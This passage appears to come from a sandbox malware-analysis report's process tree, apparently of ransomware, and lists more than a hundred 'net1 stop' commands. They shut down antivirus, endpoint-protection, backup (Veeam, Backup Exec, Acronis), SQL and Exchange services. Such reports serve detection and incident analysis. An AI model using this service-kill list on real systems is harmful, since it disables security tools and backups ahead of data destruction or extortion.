C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y1⤵PID:14508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵PID:14500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y1⤵PID:14492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y1⤵PID:14484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y1⤵PID:14472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y1⤵PID:14468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y1⤵PID:14460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y1⤵PID:14452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵PID:14444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:14436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y1⤵PID:14428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y1⤵PID:14420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y1⤵PID:14412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y1⤵PID:14404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y1⤵PID:14396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y1⤵PID:14388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:14380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y1⤵PID:14372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y1⤵PID:14364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y1⤵PID:14356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y1⤵PID:14348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y1⤵PID:14340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y1⤵PID:5308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y1⤵PID:5340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y1⤵PID:4916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y1⤵PID:4516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵PID:2400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵PID:8620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:5048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y1⤵PID:4908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y1⤵PID:4552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y1⤵PID:4956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y1⤵PID:14332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y1⤵PID:14324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y1⤵PID:14316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y1⤵PID:14308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y1⤵PID:14300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y1⤵PID:14292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y1⤵PID:14284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y1⤵PID:14276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y1⤵PID:14268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y1⤵PID:14260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y1⤵PID:14252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:14244
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y1⤵PID:14236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y1⤵PID:14228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵PID:14220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y1⤵PID:14212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y1⤵PID:14204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y1⤵PID:14196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y1⤵PID:14188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y1⤵PID:14180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵PID:14172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y1⤵PID:14164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:14156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y1⤵PID:14148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y1⤵PID:14140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y1⤵PID:14132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y1⤵PID:14124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y1⤵PID:14108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y1⤵PID:14116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵PID:14100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y1⤵PID:14092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y1⤵PID:14084
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y1⤵PID:14076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y1⤵PID:14068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y1⤵PID:14060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y1⤵PID:14052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y1⤵PID:14036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y1⤵PID:14044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y1⤵PID:14020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y1⤵PID:14012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y1⤵PID:14004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:13996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y1⤵PID:13988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:13980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y1⤵PID:13964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y1⤵PID:13948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵PID:13920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y1⤵PID:13908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y1⤵PID:13888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y1⤵PID:13880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵PID:13872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y1⤵PID:13864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y1⤵PID:13856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y1⤵PID:13848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y1⤵PID:13840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y1⤵PID:13832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y1⤵PID:13824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y1⤵PID:13816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y1⤵PID:13808
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y1⤵PID:13800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y1⤵PID:13792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵PID:13784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y1⤵PID:13776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y1⤵PID:13768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y1⤵PID:13760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y1⤵PID:13752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:13744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y1⤵PID:13736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y1⤵PID:13728
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y1⤵PID:13720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y1⤵PID:13712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y1⤵PID:13704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵PID:13696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y1⤵PID:13688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y1⤵PID:13680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y1⤵PID:13672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y1⤵PID:13664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y1⤵PID:13656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y1⤵PID:13648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:13640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y1⤵PID:13632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y1⤵PID:13624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y1⤵PID:13616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y1⤵PID:13608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y1⤵PID:13600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y1⤵PID:13592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:13584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:13564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:13556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:13548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y1⤵PID:13540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y1⤵PID:13532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y1⤵PID:13516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y1⤵PID:13508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y1⤵PID:13500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y1⤵PID:13492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y1⤵PID:13484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y1⤵PID:13476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y1⤵PID:13468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y1⤵PID:13460
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y1⤵PID:13452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y1⤵PID:13444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y1⤵PID:13436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y1⤵PID:13428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y1⤵PID:13420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y1⤵PID:13412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y1⤵PID:13404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y1⤵PID:13396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y1⤵PID:13388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y1⤵PID:13380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y1⤵PID:13372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵PID:13364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y1⤵PID:13356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:13348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:13340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y1⤵PID:13332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y1⤵PID:13324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:13316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y1⤵PID:4576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y1⤵
- Suspicious use of WriteProcessMemory
PID:4480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y1⤵PID:5028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y1⤵PID:4952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:4080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y1⤵PID:4580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y1⤵PID:5176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵PID:5212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y1⤵PID:4476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y1⤵PID:4880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y1⤵PID:8728
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y1⤵PID:4768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y1⤵PID:10060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:4612
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:4400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:13244
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:13236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:13228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y1⤵PID:13220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y1⤵PID:13208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵PID:13200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y1⤵PID:13192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y1⤵PID:12564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:12556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:12548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵PID:12540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:12532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:12524